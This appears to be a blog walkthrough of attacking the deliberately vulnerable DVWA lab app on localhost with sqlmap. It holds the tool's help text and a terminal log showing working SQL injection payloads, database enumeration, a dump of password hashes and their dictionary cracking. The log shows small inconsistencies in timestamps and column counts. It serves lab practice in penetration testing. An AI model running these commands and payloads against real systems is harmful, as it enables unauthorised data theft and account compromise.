SQL BLIND AND SQL INJECTION DVMA

 sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
 http://sqlmap.sourceforge.net
Usage: python ./sqlmap.py [options]
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:
    At least one of these options has to be specified to set the source to
    get target urls from.

    -d DIRECT           Direct connection to the database
    -u URL, --url=URL   Target url
    -l LOGFILE          Parse targets from Burp or WebScarab proxy logs
    -m BULKFILE         Scan multiple targets enlisted in a given textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target url.

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --cookie-urlencode  URL Encode generated cookie injections
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header
    --referer=REFERER   HTTP Referer header
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
    --auth-cred=ACRED   HTTP authentication credentials (name:password)
    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
    --ignore-proxy      Ignore system default HTTP proxy
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --safe-url=SAFURL   Url address to visit frequently during testing
    --safe-freq=SAFREQ  Test requests between two visits to a given safe url

  Optimization:
    These options can be used to optimize the performance of sqlmap.

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts.

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to specify how to parse and compare page
    content from HTTP responses when using blind SQL injection technique.

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)
    --string=STRING     String to match in page when the query is valid
    --regexp=REGEXP     Regexp to match in page when the query is valid
    --text-only         Compare pages based only on the textual content

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques.

    --technique=TECH    SQL injection techniques to test for (default BEUST)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements.

    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell

  Brute force:
    These options can be used to run brute force checks.

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions.

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system.

    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system.

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry.

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters.

    -s SESSIONFILE      Save and resume all data retrieved on a session file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --charset=CHARSET   Force character encoding used for data retrieval
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session file for current target
    --fresh-queries     Ignores query results stored in session file
    --save              Save options on a configuration INI file
    --update            Update sqlmap

  Miscellaneous:
    --beep              Alert when sql injection found
    --check-payload     IDS detection testing of injection payloads
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
    --forms             Parse and test forms on target url
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --mobile            Imitate smartphone through HTTP User-Agent header
    --page-rank         Display page rank (PR) for Google dork results
    --parse-errors      Parse DBMS error messages from response pages
    --replicate         Replicate dumped data into a sqlite3 database
    --tor               Use default Tor (Vidalia/Privoxy/Polipo) proxy address
    --wizard            Simple wizard interface for beginner users
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://localhost/index.php?id=2 --dbs

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 01:45:28

[01:45:28] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:45:28] [INFO] testing connection to the target url
[01:45:28] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:45:30] [INFO] testing if GET parameter 'id' is dynamic
[01:45:30] [INFO] confirming that GET parameter 'id' is dynamic
[01:45:31] [INFO] GET parameter 'id' is dynamic
[01:45:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:45:31] [INFO] testing sql injection on GET parameter 'id'
[01:45:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:31] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:45:33] [WARNING] GET parameter 'id' is not injectable
[01:45:33] [INFO] testing if GET parameter 'Submit' is dynamic
[01:45:33] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:45:33] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:45:33] [INFO] testing sql injection on GET parameter 'Submit'
[01:45:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:34] [INFO] testing 'Oracle AND time-based blind'
[01:45:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:35] [WARNING] GET parameter 'Submit' is not injectable
[01:45:35] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:45:35

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 01:46:10

[01:46:10] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:10] [INFO] testing connection to the target url
[01:46:10] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:13] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:46:13] [INFO] testing sql injection on GET parameter 'id'
[01:46:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:14] [INFO] testing 'Oracle AND time-based blind'
[01:46:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:46:16] [WARNING] GET parameter 'id' is not injectable
[01:46:16] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:16] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:16] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:16] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:17] [INFO] testing 'Oracle AND time-based blind'
[01:46:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:18] [WARNING] GET parameter 'Submit' is not injectable
[01:46:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:46:18

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 01:46:31

[01:46:31] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:31] [INFO] testing connection to the target url
[01:46:31] [INFO] testing if the provided string is within the target URL page content
[01:46:31] [INFO] testing if GET parameter 'id' is dynamic
[01:46:31] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:31] [INFO] GET parameter 'id' is dynamic
[01:46:32] [INFO] heuristics detected web page charset 'ascii'
[01:46:32] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[01:46:32] [INFO] testing sql injection on GET parameter 'id'
[01:46:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:42] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:46:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:42] [INFO] target url appears to be UNION injectable with 2 columns
[01:46:42] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[01:46:45] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:45] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:45] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:45] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:49] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9643=9643 AND 'KTii'='KTii&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'nCjY'='nCjY&Submit=Submit
---

[01:46:49] [INFO] manual usage of GET payloads requires url encoding
[01:46:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:49] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:50

Scan DataBase in folder DVWA
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:50

[01:46:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:50] [INFO] resuming injection data from session file
[01:46:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:50] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---

[01:46:50] [INFO] manual usage of GET payloads requires url encoding
[01:46:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:50] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:42:45

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:51

[01:46:51] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:51] [INFO] resuming injection data from session file
[01:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---

[00:44:35] [INFO] manual usage of GET payloads requires url encoding
[00:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:53

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:53

[01:46:53 [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:53] [INFO] resuming injection data from session file
[01:46:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---

[01:46:53] [INFO] manual usage of GET payloads requires url encoding
[01:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[01:46:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[01:46:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[01:46:55] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:46:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[01:46:58] [INFO] starting dictionary attack (md5_generic_passwd)
[01:46:58] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[01:46:58] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[01:46:58] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[01:46:58] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[01:46:58] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[01:46:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

 

0 comments:

Post a Comment